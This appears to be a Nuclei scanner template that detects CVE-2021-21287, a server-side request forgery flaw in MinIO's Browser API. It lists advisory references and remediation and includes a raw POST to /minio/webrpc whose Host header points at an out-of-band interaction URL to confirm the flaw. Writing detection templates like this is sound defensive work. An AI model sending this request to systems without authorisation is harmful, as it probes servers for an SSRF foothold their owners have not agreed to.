id: CVE-2021-21287 info: name: MinIO Browser API - Server-Side Request Forgery author: pikpikcu severity: high description: MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability. remediation: | Apply the latest security patches or updates provided by MinIO to fix this vulnerability. reference: - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html - https://github.com/minio/minio/pull/11337 - https://nvd.nist.gov/vuln/detail/CVE-2021-21287 - https://github.com/minio/minio/commit/eb6871ecd960d570f70698877209e6db181bf276 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N cvss-score: 7.7 cve-id: CVE-2021-21287 cwe-id: CWE-918 epss-score: 0.97264 epss-percentile: 0.99792 cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: minio product: minio tags: cve,cve2021,minio,ssrf,oast http: - raw: - | POST /minio/webrpc HTTP/1.1 Host: {{interactsh-url}} Content-Type: application/json User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 Content-Length: 76 {"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" # Confirms the HTTP Interaction - type: word words: - "We encountered an internal error" # digest: 4b0a00483046022100fb8c95a2e4522aa48a48fc7dd79e805d6a620a7afed328e996016722ef79eac60221008cb034badbe0b644b84433aa5906c6a1d558d85f1717e3e8672d2bb4c40e4333:922c64590222798bb761d5b6d8e72950